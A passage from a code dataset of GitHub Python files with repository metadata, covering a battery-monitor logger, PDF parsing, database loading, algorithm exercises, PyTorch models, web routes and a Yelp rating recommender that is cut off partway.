to 99.9C\n\t# Converting to fahrenheit\n\t\tExternal_temp = float((dcmp(26, 2, var_sbms)-450)/10*9/5+32)\n\t\tExternal_temp = round(External_temp,3)\n\t# print('External temp = ' + str(External_temp) + '\\n') \n\n\t# Bat + and - sign at [28] is not compressed\n\t\tsign = var_sbms[28]\n\n\t\tBatt_current = round(float(dcmp(29, 3, var_sbms))/1000,3)\n\t\tif(sign == '-'):\n\t\t\tBatt_current = (-1)*Batt_current\n\t#\tprint('Battery current = ' + str(Batt_current) + '\\n')\n\n\t\tPV1 = float(dcmp(32, 3, var_sbms))\n\t# print('PV1 current = ' + str(PV1) + '\\n')\n\n\t\tPV2 = float(dcmp(35, 3, var_sbms))\n\t# print('PV2 current = ' + str(PV2) + '\\n')\n\n\t\tExternal_load = (dcmp(38, 3, var_sbms))\n\t#\tprint('External load current = ' + str(External_load) + '\\n')\n\n\t\tADC2 = float(dcmp(41, 3, var_sbms))\n\t#\tprint('ADC2 = ' + str(ADC2) + '\\n')\n\n\t\tADC3 = float(dcmp(44, 3, var_sbms))\n\t#\tprint('ADC3 = ' + str(ADC3) + '\\n')\n\n\t\tADC4 = float(dcmp(47, 3, var_sbms))\n\t#\tprint('ADC4 = ' + str(ADC4) + '\\n')\n\n\t\theat1 = float(dcmp(50, 3, var_sbms))\n\t# print('heat1 = ' + str(heat1) + '\\n')\n\n\t\theat2 = float(dcmp(53, 3, var_sbms))\n\t# print('heat2 = ' + str(heat2) + '\\n')\n\n\t\tERR = dcmp(56, 3, var_sbms)\n\t# print('ERR_code = '+ str(ERR) + 'change to binary\\n')\n\n\t# calculations\n\t\tBattery_voltage = (Cell1 + Cell2 + Cell3 + Cell4 + Cell5 + Cell6 + Cell7 + Cell8)\n\t#\tBattery_voltage = round(Battery_voltage, 3)\n\t# print('Battery voltage = ' + str(Battery_voltage) + 'V')\n\n\t# External load\n\t\tExternal_load = float(External_load / 1000)\n\t\tExternal_load = round(External_load, 3)\n\t# print('External Load current = ' + str(External_load) + 'A')\n\n\t# Total PV current\n\t\tPV_total_current = (PV1 + PV2) / 1000\n\t\tPV_total_current = round(PV_total_current, 3)\n\n\t# print('Total PV current = ' + str(PV_total_current) + 'A')\n\n\t#Converting error to binary\n\t\tError_Binary = '{0:08b}'.format(ERR)\n\n\t#Capturing SBMS0 flag values to array \n\t\tflags = []\n\t\tif(ERR & 16384):\n\t\t\tflags.append('DFET')\n\t\tif(ERR & 8192):\n\t\t\tflags.append('EOC')\n\t\tif(ERR & 4096):\n\t\t\tflags.append('CFET')\n\t\tif(ERR & 2048):\n\t\t\tflags.append('ECCF')\n\t\tif(ERR & 1024):\n\t\t\tflags.append('LVC')\n\t\tif(ERR & 512):\n\t\t\tflags.append('OPEN')\n\t\tif(ERR & 256):\n\t\t\tflags.append('CELF')\n\t\tif(ERR & 128):\n\t\t\tflags.append('DSC')\n\t\tif(ERR & 64):\n\t\t\tflags.append('DOC')\n\t\tif(ERR & 32):\n\t\t\tflags.append('COC')\n\t\tif(ERR & 16):\n\t\t\tflags.append('IOT')\n\t\tif(ERR & 8):\n\t\t\tflags.append('UVLK')\n\t\tif(ERR & 4):\n\t\t\tflags.append('UV')\n\t\tif(ERR & 2):\n\t\t\tflags.append('OVLK')\n\t\tif(ERR & 1):\n\t\t\tflags.append('OV')\n\n\t# Joining flags to a single string for simple output\n\t\tseparator = \", \"\n\t\tflags = separator.join(flags)\n\n\t# Creating Cell Delta values\n\t\tvoltages = [Cell1,Cell2,Cell3,Cell4,Cell5,Cell6,Cell7,Cell8]\n\t\tmaxv = max(voltages)\n\t\tminv = min(i for i in voltages if i > 0)\n\t\tdelta = maxv-minv\n\t# print('Cell Voltage Delta = ' + str(delta) + 'V' + '\\n')\n\n\t# Create DB payload\n\t\tjson_body = [\n\t\t{\n\t\t\t\"measurement\": \"SBMS_Metrics\",\n\t\t\t\"tags\": {\n\t\t\t\t\"Name\": \"SBMS0a\"\n\t\t\t},\n\t\t\t\"fields\": {\n\t\t\t\t\"External Temperature\": External_temp,\n\t\t\t\t\"Internal Temperature\": Internal_temp,\n\t\t\t\t\"Monitor Flags\": flags,\n\t\t\t\t\"Battery Voltage\": Battery_voltage,\n\t\t\t\t\"Battery Current\": Batt_current,\n\t\t\t\t\"PV Total Current\": PV_total_current,\n\t\t\t\t\"PV1\": PV1,\n\t\t\t\t\"PV2\": PV2,\n\t\t\t\t\"External Load\": External_load,\n\t\t\t\t\"State of Charge\": SOC,\n\t\t\t\t\"ADC2\": ADC2,\n\t\t\t\t\"ADC2\": ADC3,\n\t\t\t\t\"ADC2\": ADC4,\n\t\t\t\t\"Heat 1\": heat1,\n\t\t\t\t\"Heat 2\": heat2,\n\t\t\t\t\"Cell 1\": Cell1,\n\t\t\t\t\"Cell 2\": Cell2,\n\t\t\t\t\"Cell 3\": Cell3,\n\t\t\t\t\"Cell 4\": Cell4,\n\t\t\t\t\"Cell 5\": Cell5,\n\t\t\t\t\"Cell 6\": Cell6,\n\t\t\t\t\"Cell 7\": Cell7,\n\t\t\t\t\"Cell 8\": Cell8,\n\t\t\t\t\"Cell Delta\": delta\n\t\t\t\t}\n\t\t\t}\n\t\t]\n\t# Write to DB\n\t\tclient.write_points(json_body)\n\telse:\n\t\ttime.sleep(10)\n","repo_name":"Burtond/Electrodacus","sub_path":"sbms0-SerialToInfluxDB.py","file_name":"sbms0-SerialToInfluxDB.py","file_ext":"py","file_size_in_byte":6147,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"3"} +{"seq_id":"27331966224","text":"# from tika import parser\nimport PyPDF2 as p2\nimport os\npath = \"C:/Users/karin/OneDrive/Desktop/rb/pdfmap/pdf\"\nteststring = \"hi there (everyone will get better\"\npdfmap = []\nfiles = []\n# r=root, d=directories, f = files\nfor r, d, f in os.walk(path):\n for file in f:\n if '.pdf' in file:\n files.append(os.path.join(r, file))\n\nfor f in files:\n # print(f)\n\n#PDFpy2\n PDFfile = open(f,\"rb\")\n pdfr = p2.PdfFileReader(PDFfile)\n x = pdfr.getPage(0)\n #print(x.extractText())\n y = x.extractText()[102:138]\n if y in pdfmap:\n # pdfmap.append(y)\n print(teststring)\n else:\n # print(teststring)\n print(y)\n pdfmap.append(y)\n# print(len(pdfmap))\n# test = \"(F,K,E,I)(R,M,T,O)(P,R,N,T)(O,I,Q,K)\"\n# print(test in pdfmap)\n# print(test)","repo_name":"krxwer4/WROAllTheTime","sub_path":"Dataset/pdfmap/map.py","file_name":"map.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9899700912","text":"# Author: Ritaank Tiwari\n\nimport argparse\nimport os.path as osp\nimport subprocess\nfrom loguru import logger\n\ndef create_parser():\n parser = argparse.ArgumentParser(description='Setup the directory structure for SOMA')\n parser.add_argument('--studies_path', type=str, help='The path to S: from your device', default='/mnt/S/')\n return parser\n\ndef copy_dirs(args):\n\n dirs = ['soma-root', 'smpl-fast-derivatives.tar.bz2', 'bpy-2.83-20200908.tar.bz2']\n\n for dir in dirs:\n path_to_dir_base = osp.join(args.studies_path, '_Repositories','soma-setup', dir)\n logger.info(f\"copying {dir} from {path_to_dir_base} to .\")\n try:\n subprocess.run(['cp', '-R', path_to_dir_base, '.'])\n except:\n logger.error(f'Could not find {dir}. Please check the path to the studies folder')\n return\n \n logger.success(f\"Successfully copied {dir} to .\")\n\ndef setup(args):\n copy_dirs(args)\n\nif __name__ == \"__main__\":\n parser = create_parser()\n args = parser.parse_args()\n setup(args)","repo_name":"ritaank/SOMA-interface","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"6047236317","text":"import json\nimport sys\nfrom Database import MyDatabase\n\nwith open('properties.json', 'r') as f:\n properties = json.load(f)\n\ndb = MyDatabase('wikidata.db', connect_each=False)\ndb.create(True, 'Entities', [('id', 'TEXT'), ('label', 'TEXT'), ('description', 'TEXT')])\ndb.create(True, 'Properties', [('property_id', 'TEXT'), ('label', 'TEXT'), ('description', 'TEXT')])\ndb.create(True, 'Relations', [('head_id', 'TEXT'), ('property', 'TEXT'), ('target', 'TEXT')])\n\nwith open('summarized.txt', 'r') as f:\n for i, line in enumerate(f):\n data = json.loads(line.strip())\n if data[0].startswith('Q'):\n db.insert('Entities', [(data[0], data[1], data[2])])\n elif data[0].startswith('P'):\n db.insert('Properties', [(data[0], data[1], data[2])])\n else:\n print(data[0])\n \n for r, val in data[4]:\n if r in properties and data[0].startswith('Q'):\n db.insert('Relations', [(data[0], r, json.dumps(val))])\n \n sys.stdout.write('finished {}/{} \\r'.format(i, 70900911))\n\ndb.commit()\ndb.close()\n","repo_name":"wenhuchen/KGPT","sub_path":"preprocess/create_db.py","file_name":"create_db.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":142,"dataset":"github-code","pt":"3"} +{"seq_id":"30222739840","text":"#Runtime: O(n) | Space: O(1)\n#\t\t where n is the length of \"arr\" array\ndef max_subset_sum_non_adjacent(arr):\n\t#From looking at the 2nd soln (below this one), we can see that we only need to keep track of two values\n\t#The max at that specific index is either the sum of that current value plus the maxSum at the index two spots before or the maxSum at the previous index\n\t#Due to this, we just need to keep track of and update the prevMaxSum and prevPrevMaxSum.\n\t#Everything else remains the same so look at the 2nd soln for more details\n\tif len(arr) == 0:\n\t\treturn 0\n\n\tprevPrevMaxSum = arr[0]\n\tif len(arr) == 1:\n\t\treturn prevPrevMaxSum\n\n\tprevMaxSum = arr[1]\n\tif len(arr) == 2:\n\t\treturn prevMaxSum\n\n\tfor i in range(2, len(arr)):\n\t\tcurrMaxSum = max(prevMaxSum, arr[i]+prevPrevMaxSum)\n\t\tprevPrevMaxSum = prevMaxSum\n\t\tprevMaxSum = currMaxSum\n\n\treturn prevMaxSum\n\n\n#Runtime: O(n) | Space: O(n)\n#\t\t where n is the length of \"arr\" array\ndef max_subset_sum_non_adjacent2(arr):\n\t#Check if empty list and return 0\n\t#First initialize a list (maxArr) of same length as arr and initialize them all to 0.\n\t#Fill the first index of maxArr with first value of arr.\n\t\t#Then, check if length of arr is 1 and if it is, return that first index's value\n\t#Fill the second index of maxArr with max(arr[0], arr[1])\n\t\t#Then, check if length of arr is 2 and if it is, return the second index's value \n\t#This maxArr would indicate at each index, what the max subset sum would be if the list ended at that index\n\t\t#We go through remaining vals in arr and fill its corresponding maxArr value by using the following formula \n\t\t#maxArr[i] = max(arr[i]+maxArr[i-2], maxArr[i-1])\n\t#Return the last index's value\n\n\tif len(arr) == 0:\n\t\treturn 0\n\n\tmaxArr = [0 for x in range(len(arr))]\n\n\tmaxArr[0] = arr[0]\n\tif len(arr) == 1:\n\t\treturn maxArr[0]\n\n\tmaxArr[1] = max(arr[0], arr[1])\n\tif len(arr) == 2:\n\t\treturn maxArr[1]\n\n\tfor i in range(2, len(maxArr)):\n\t\tmaxArr[i] = max(arr[i] + maxArr[i-2], maxArr[i-1])\n\n\treturn maxArr[-1]\n\n\n\n\narr1 = [75, 105, 120, 75, 90, 135]\nprint(max_subset_sum_non_adjacent(arr1))\n#330 because of [75, 120, 135] \n\narr2 = [1, 2]\nprint(max_subset_sum_non_adjacent(arr2))\n#2 because of [2] \n\narr3 = [3, 3, 3, 4, 10, 4]\nprint(max_subset_sum_non_adjacent(arr3))\n#16 because of [3, 3, 10]","repo_name":"AlvinNgo123/leetcode_practice","sub_path":"year1/max_subset_sum_non_adjacent.py","file_name":"max_subset_sum_non_adjacent.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13619244773","text":"#!/usr/bin/python\n\nfrom typing import List\n\n\"\"\"\nGiven an array of integers, return indices of the two numbers such that \nthey add up to a specific target.\n\nYou may assume that each input would have exactly one solution, and you \nmay not use the same element twice.\n\nExample:\n\nGiven nums = [2, 7, 11, 15], target = 9,\n\nBecause nums[0] + nums[1] = 2 + 7 = 9,\nreturn [0, 1].\n\"\"\"\n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n \"\"\"\n O(n) solution\n \"\"\"\n map_ = {}\n idx = 0\n \n for v in nums:\n if target - v in map_.keys():\n return [map_[target -v], idx]\n map_[v] = idx\n idx += 1\n return [-1, -1]\n # End twoSum\n","repo_name":"stefan-lin/leetcode","sub_path":"1_twosum/py_solution/twosum.py","file_name":"twosum.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1151967","text":"import torch\nfrom torch import nn as nn\nimport torch.nn.functional as F\n\n\nclass Alert(nn.Module):\n def __init__(self, width=48, height=48, initialization=None, num_channels=384):\n super().__init__()\n if initialization == 'normal':\n initialize_weights = nn.init.xavier_normal_\n elif initialization == 'uniform':\n initialize_weights = nn.init.xavier_uniform_\n elif initialization is None:\n pass\n else:\n raise Exception('There is no such initialization')\n\n self.mean_pool = torch.nn.AvgPool2d(kernel_size=(width, height))\n self.max_pool = torch.nn.MaxPool2d(kernel_size=(width, height))\n self.fc1 = nn.Linear(in_features=num_channels*3, out_features=num_channels)\n\n self.bn1 = nn.BatchNorm1d(num_channels)\n self.fc2 = nn.Linear(in_features=num_channels, out_features=num_channels//4)\n\n self.bn2 = nn.BatchNorm1d(num_channels//4)\n self.fc3 = nn.Linear(in_features=num_channels//4, out_features=12)\n\n self.bn3 = nn.BatchNorm1d(12)\n self.fc4 = nn.Linear(in_features=12, out_features=1)\n\n self.bn4 = nn.BatchNorm1d(1)\n self.fc5 = nn.Linear(in_features=1, out_features=1)\n\n if initialization is not None:\n initialize_weights(self.fc1.weight)\n initialize_weights(self.fc2.weight)\n initialize_weights(self.fc3.weight)\n initialize_weights(self.fc4.weight)\n initialize_weights(self.fc5.weight)\n\n def statistical_pooling(self, x):\n std = torch.std(x,dim=(2,3)) # (B*C*H*W) -> (B*C)\n return std\n\n def mean_max_std(self, x):\n mean = self.mean_pool(x) # -> (B*C*1*1)\n mean = mean.squeeze() # -> (B*C)\n maximum = self.max_pool(x)\n maximum = maximum.squeeze()\n std = self.statistical_pooling(x)\n return torch.cat((mean, maximum, std), dim=1) #-> (B*(3*C))\n\n def forward(self, x):\n ###\n # x1 is used only for testing:\n x1 = self.mean_max_std(x)\n ###\n x = self.mean_max_std(x)\n ###\n # add extra channels for testing\n for i in range(127):\n x = torch.cat((x,x1), dim=1)\n ###\n x = F.relu(self.fc1(x))\n x = self.bn1(x)\n x = F.relu(self.fc2(x))\n x = self.bn2(x)\n x = F.relu(self.fc3(x))\n x = self.bn3(x)\n x = F.relu(self.fc4(x))\n x = self.bn4(x)\n x = torch.sigmoid(self.fc5(x))\n return x\n\n","repo_name":"victoria-lokteva/Performance-Monitoring-of-Object-Detection","sub_path":"alert.py","file_name":"alert.py","file_ext":"py","file_size_in_byte":2495,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"29039664233","text":"import os\nfrom os.path import abspath, dirname, join\n\n# This is simply a default location we've decided that some configuration\n# settings will use for their path.\n#\n# Making it configurable doesn't make a lot of sense because this is only where\n# default settings put files, such as static assets, the whoosh index, ect.\n# All of which can be configured in the yaml config file anyways.\nDEFAULT_INSTALL_PATH = '/opt/ganeti_webmgr'\n\n# Config location variables\n\n# default config directory is DEFAULT_INSTALL_PATH/config\nDEFAULT_CONFIG_DIR = join(DEFAULT_INSTALL_PATH, 'config')\n# try getting config directory from environment,\n# defaulting to DEFAULT_CONFIG_DIR\nCONFIG_DIR = os.environ.get('GWM_CONFIG_DIR', DEFAULT_CONFIG_DIR)\n# our config file is always named config.yml\nCONFIG_PATH = join(CONFIG_DIR, 'config.yml')\n\n\n# Path Helpers\ndef here(*x):\n \"\"\"\n This is a wrapper around join. It will return a path relative to the\n current file.\n \"\"\"\n return join(abspath(dirname(__file__)), *x)\n\n# This is the directory containing our python package\n# This will be site-packages or the root of the git checkout if not installed\n# as a python package\nPROJECT_ROOT = here(\"..\", \"..\", \"..\")\n\n\ndef root(*x):\n \"\"\"\n This is a wrapper around join. It will return a path relative to\n PROJECT_ROOT.\n \"\"\"\n return join(abspath(PROJECT_ROOT), *x)\n\napp_root = lambda *x: root('ganeti_webmgr', *x)\n\n# -- Project structure variables ---------------------------------------------\nSITE_NAME = 'Ganeti Web Manager'\n\n\ndef generate_secret(secret_size=32):\n \"Generates a secret key of the given size\"\n import random\n import string\n valid_chars = string.digits + string.letters\n return ''.join(\n random.SystemRandom().choice(valid_chars)\n for i in xrange(secret_size)\n )\n\n\ndef ugettext(s):\n \"\"\"Horrible Django hack for convincing Django that we are i18n'd.\"\"\"\n return s\n","repo_name":"osuosl/ganeti_webmgr","sub_path":"ganeti_webmgr/ganeti_web/settings/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"3"} +{"seq_id":"74553760082","text":"from fastapi import APIRouter, status\n\nfrom lucy.api.logging_api import ApiLogger\n\nfrom lucy.model.create_bot import CreateDcaBot\nfrom lucy.model.bot import DcaBot\nfrom lucy.infrastructure.repos.bot_repository import BotRepository\n\nrouter = APIRouter()\nlogger = ApiLogger.get_logger(\"bot_routes\")\n\n\n@router.get(\"/bots\")\ndef all_bots():\n logger.info(\"Fetching all bots\")\n bots = BotRepository().fetch_bots()\n return {\"data\": bots}\n\n\n@router.get(\"/bots/{bot_id}\")\ndef bot(bot_id: str):\n return {\"data\": BotRepository().fetch(bot_id)}\n\n\n@router.get(\"/bots/{bot_id}/summary\")\ndef summary(bot_id: str):\n bot = BotRepository().fetch(bot_id)\n positionsCnt = len(bot.positions)\n open_positions = bot.num_open_positions()\n\n resp = {\n \"id\": bot.id,\n \"name\": bot.name,\n \"description\": bot.description,\n \"capital\": bot.capital,\n \"entry_size\": bot.entry_size,\n \"so_size\": bot.so_size,\n \"max_safety_orders\": bot.max_safety_orders,\n \"allow_shorts\": bot.allow_shorts,\n \"positions\": positionsCnt,\n \"currently_open_positions\": open_positions,\n \"profit\": bot.profit()}\n\n return {\"data\": resp}\n\n\n@router.post(\"/bots\", status_code=status.HTTP_201_CREATED)\ndef create_bot(create_bot: CreateDcaBot):\n bot = DcaBot.create_new(create_bot)\n BotRepository().add(bot)\n","repo_name":"magnusblondal/lucy","sub_path":"lucy/api/app/routers/bot_routes.py","file_name":"bot_routes.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"16660308515","text":"from multiprocessing import Pool, cpu_count\nimport pandas as pd\n\n\n# define traverse to unlist the lists in a list\ndef traverse(o, tree_types=(list, tuple)):\n if isinstance(o, tree_types):\n for value in o:\n for subvalue in traverse(value, tree_types):\n yield subvalue\n else:\n yield o\n\n\ndef process_Pandas_data(func, df, stemDeptKeys=None, num_processes=None, index=0):\n ''' Apply a function separately to each sub-dataframe, in parallel.'''\n \n # If num_processes is not specified, default to #machine-cores\n if num_processes==None:\n num_processes = cpu_count()\n \n # 'with' context manager takes care of pool.close() and pool.join() for us\n with Pool(num_processes) as pool:\n \n # calculate the chunk size as an integer\n chunk_size = int(df.shape[0]/num_processes)\n chunks = [df.iloc[df.index[i:i + chunk_size]] for i in range(0, df.shape[0], chunk_size)]\n \n # pool.map returns results as a list\n results_list = pool.map(func, chunks)\n \n # return list of processed columns, concatenated together as a new dataframe\n return pd.concat(results_list)","repo_name":"sarauny/DepartmentClassifier","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4644406619","text":"import os\nimport pickle as pkl\nimport argparse\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nparser = argparse.ArgumentParser(description='Plotting MFTMA analysis results (classification '\n 'capacity, manifold radius, manifold dimension '\n 'and center correlation) over layers')\nparser.add_argument('--num_layers', type=int, default=12, help='Number of hidden layers.')\nparser.add_argument('--mftma_analysis_dir', type=str, default='mftma-analysis',\n help='Location to output MFTMA analysis directory.')\n\nargs = parser.parse_args()\nprint(args)\n\ncapacities = []\nradii = []\ndimensions = []\ncorrelations = []\n\nfor layer in range(1,args.num_layers+1):\n temp_data = pkl.load(open(os.path.join(args.mftma_analysis_dir,str(layer)+'.pkl'), 'rb+'))\n a = 1 / np.mean(1 / temp_data['a'])\n r = np.mean(temp_data['r'])\n d = np.mean(temp_data['d'])\n r0 = temp_data['r0']\n if layer == 1:\n norm_a = a\n norm_r = r\n norm_d = d\n norm_r0 = r0\n\n a /= norm_a\n r /= norm_r\n d /= norm_d\n r0 /= norm_r0\n print(\"{} capacity: {:4f}, radius {:4f}, dimension {:4f}, correlation {:4f}\".format(\n 'LAYER_' + str(layer), a, r, d, r0))\n\n capacities.append(a)\n radii.append(r)\n dimensions.append(d)\n correlations.append(r0)\n\nfig, axes = plt.subplots(1, 4, figsize=(18, 4))\n\naxes[0].plot(capacities, linewidth=5)\naxes[1].plot(radii, linewidth=5)\naxes[2].plot(dimensions, linewidth=5)\naxes[3].plot(correlations, linewidth=5)\n\naxes[0].set_ylabel(r'$\\alpha_M$', fontsize=18)\naxes[1].set_ylabel(r'$R_M$', fontsize=18)\naxes[2].set_ylabel(r'$D_M$', fontsize=18)\naxes[3].set_ylabel(r'$\\rho_{center}$', fontsize=18)\n\nxticklabels = [i for i in range(1,args.num_layers+1)]\nfor ax in axes:\n ax.set_xticks([i for i, _ in enumerate(xticklabels)])\n ax.set_xlabel('Layer')\n ax.set_xticklabels(xticklabels, rotation=90, fontsize=16)\n ax.tick_params(axis='both', which='major', labelsize=14)\n\nplt.tight_layout()\nplt.show()","repo_name":"schung039/contextual-repr-manifolds","sub_path":"generate_plot.py","file_name":"generate_plot.py","file_ext":"py","file_size_in_byte":2074,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"} +{"seq_id":"6555861601","text":"import torch.nn as nn\r\n\r\nclass DecoderLSTM(nn.Module):\r\n def __init__(self, input_size, embedding_size, hidden_size, num_layers, p, output_size):\r\n super(DecoderLSTM, self).__init__()\r\n\r\n # Size of the one hot vectors that will be the input to the encoder\r\n #self.input_size = input_size\r\n\r\n # Output size of the word embedding NN\r\n #self.embedding_size = embedding_size\r\n\r\n # Dimension of the NN's inside the lstm cell/ (hs,cs)'s dimension.\r\n self.hidden_size = hidden_size\r\n\r\n # Number of layers in the lstm\r\n self.num_layers = num_layers\r\n\r\n # Size of the one hot vectors that will be the output to the encoder (English Vocab Size)\r\n self.output_size = output_size\r\n\r\n # Regularization parameter\r\n self.dropout = nn.Dropout(p)\r\n\r\n # Shape --------------------> (5376, 300) [input size, embedding dims]\r\n self.embedding = nn.Embedding(input_size, embedding_size)\r\n\r\n # Shape -----------> (300, 2, 1024) [embedding dims, hidden size, num layers]\r\n self.LSTM = nn.LSTM(embedding_size, hidden_size, num_layers, dropout = p)\r\n\r\n # Shape -----------> (1024, 4556) [embedding dims, hidden size, num layers]\r\n self.fc = nn.Linear(hidden_size, output_size)\r\n\r\n # Shape of x (32) [batch_size]\r\n def forward(self, x, hidden_state, cell_state):\r\n\r\n # Shape of x (1, 32) [1, batch_size]\r\n x = x.unsqueeze(0)\r\n\r\n # Shape -----------> (1, 32, 300) [1, batch_size, embedding dims]\r\n embedding = self.dropout(self.embedding(x))\r\n\r\n # Shape --> outputs (1, 32, 1024) [1, batch_size , hidden_size]\r\n # Shape --> (hs, cs) (2, 32, 1024) , (2, 32, 1024) [num_layers, batch_size size, hidden_size] (passing encoder's hs, cs - context vectors)\r\n outputs, (hidden_state, cell_state) = self.LSTM(embedding, (hidden_state, cell_state))\r\n\r\n # Shape --> predictions (1, 32, 4556) [ 1, batch_size , output_size]\r\n predictions = self.fc(outputs)\r\n\r\n # Shape --> predictions (32, 4556) [batch_size , output_size]\r\n predictions = predictions.squeeze(0)\r\n\r\n return predictions, hidden_state, cell_state\r\n\r\n# input_size_decoder = len(english.vocab)\r\n# decoder_embedding_size = 300\r\n# hidden_size = 1024\r\n# num_layers = 2\r\n# decoder_dropout = 0.5\r\n# output_size = len(english.vocab)\r\n#\r\n# decoder_lstm = DecoderLSTM(input_size_decoder, decoder_embedding_size,\r\n# hidden_size, num_layers, decoder_dropout, output_size).to(device)\r\n# print(decoder_lstm)","repo_name":"71115217/ComparativeQG","sub_path":"Seq2Seq/LSTMDecoder.py","file_name":"LSTMDecoder.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"1228604346","text":"from django.contrib import admin\nfrom django.urls import include, path\nfrom . import views\n\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"sentry-debug/\", views.trigger_error, name=\"sentry\"),\n path(\"lettings/\", include(\"lettings.urls\", namespace=\"lettings\")),\n path(\"profiles/\", include(\"profiles.urls\", namespace=\"profiles\")),\n path(\"admin/\", admin.site.urls, name=\"admin\"),\n]\n","repo_name":"Solayman-B/P13_bchir_solayman","sub_path":"oc_lettings_site/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9047186109","text":"import os\nimport setuptools\n\nwith open('requirements.txt') as f:\n requirements = f.read().splitlines()\n\n_ROOT = os.path.abspath(os.path.dirname(__file__))\n\nwith open(os.path.join(_ROOT, 'README.md')) as f:\n LONG_DESCRIPTION = f.read()\n\nsetuptools.setup(\n name=\"gh-pr-commenter\",\n version=\"1.0.0\",\n description=\"Simple Script to post a github comment to a given PR based on a jinja2 template\",\n long_description=LONG_DESCRIPTION,\n long_description_content_type=\"text/markdown\",\n author=\"enen92\",\n url=\"https://github.com/enen92/github-pr-log-commenter\",\n download_url=\"https://github.com/enen92/github-pr-log-commenter/archive/main.zip\",\n install_requires=requirements,\n python_requires=\">=3.5\",\n setup_requires=['setuptools>=38.6.0'],\n scripts=['gh-pr-commenter.py'],\n keywords='github pr-comment',\n classifiers=[\n \"Operating System :: POSIX :: Linux\",\n \"License :: OSI Approved :: GNU General Public License v2 (GPLv2)\",\n \"Operating System :: Microsoft :: Windows\",\n \"Operating System :: MacOS\",\n \"Development Status :: 5 - Production/Stable\",\n \"Environment :: Console\",\n \"Intended Audience :: Developers\",\n \"Topic :: Utilities\"\n ] + [('Programming Language :: Python :: %s' % x) for x in '3 3.5 3.6 3.7'.split()]\n)","repo_name":"enen92/github-pr-log-commenter","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11990065105","text":"# Method Description:\n# In order to improve the recommender system, what I choose is using model-based CF which has better performance\n# To improve the performance, I added another two attribute which are \"fan\" in user.json and \"wifi\" from business.json\n# And also, I change the parameter of default value of noise level which also improve a little of the RMSE.\n#\n#Error Distribution:\n# >=0 and <1: 101971\n# >=1 and <2: 33037\n# >=2 and <3: 6195\n# >=3 and <4: 840\n# >=4: 1\n#\n# RMSE:\n# 0.9819253043558718\n#\n# Esecution Time:\n# 47.41270709037781s\nimport os\nimport sys\nimport json\nimport time\nimport numpy as np\nimport pandas as pd\nimport xgboost as xgb\nfrom pyspark import SparkContext, SparkConf\n\n\ndef get_noise_level(attributes):\n if attributes:\n if \"NoiseLevel\" in attributes.keys():\n if attributes[\"NoiseLevel\"] == 'quiet':\n return 1\n elif attributes[\"NoiseLevel\"] == 'average':\n return 2\n elif attributes[\"NoiseLevel\"] == 'loud':\n return 3\n elif attributes[\"NoiseLevel\"] == 'very_loud':\n return 4\n return 3\n\n\ndef have_wifi(attributes):\n if attributes:\n if \"WiFi\" in attributes.keys():\n if attributes[\"WiFi\"] == 'free':\n return 2\n elif attributes[\"WiFi\"] == 'no':\n return 0\n else:\n return -1\n return -1\n\n\ndef get_data(data, user_map, business_map, default_user, default_business):\n output = {}\n user_review_count = []\n user_userful = []\n user_stars = []\n user_fans = []\n business_review_count = []\n business_stars = []\n business_noise = []\n business_wifi = []\n for user in data['user_id']:\n if user in user_map.keys():\n user_review_count.append(user_map.get(user)[0])\n user_userful.append(user_map.get(user)[1])\n user_stars.append(user_map.get(user)[2])\n user_fans.append(user_map.get(user)[3])\n else:\n user_review_count.append(default_user['review_count'])\n user_userful.append(default_user['userful'])\n user_stars.append(default_user['stars'])\n user_fans.append(default_user['fans'])\n for business in data['business_id']:\n if business in business_map.keys():\n business_review_count.append(business_map.get(business)[1])\n business_stars.append(business_map.get(business)[0])\n business_noise.append(business_map.get(business)[2])\n business_wifi.append(business_map.get(business)[3])\n else:\n business_review_count.append(default_business['review_count'])\n business_stars.append(default_business['stars'])\n business_noise.append(default_business['noise'])\n business_wifi.append(default_business['wifi'])\n\n output['user_review_count'] = user_review_count\n output['useful'] = user_userful\n output['user_stars'] = user_stars\n output['fans'] = user_fans\n output['business_review_count'] = business_review_count\n output['business_stars'] = business_stars\n output['noise'] = business_noise\n output['wifi'] = business_wifi\n\n return output\n\n\ndef competition(folder_path, test_file_name, output_file_name):\n\n start_time = time.time()\n # folder_path = 'data/'\n # test_file_name = 'yelp_val.csv'\n # output_file_name = 'task2_2.csv'\n train_file = os.path.join(folder_path, 'yelp_train.csv')\n user_json_path = os.path.join(folder_path, 'user.json')\n business_json_path = os.path.join(folder_path, 'business.json')\n\n conf = 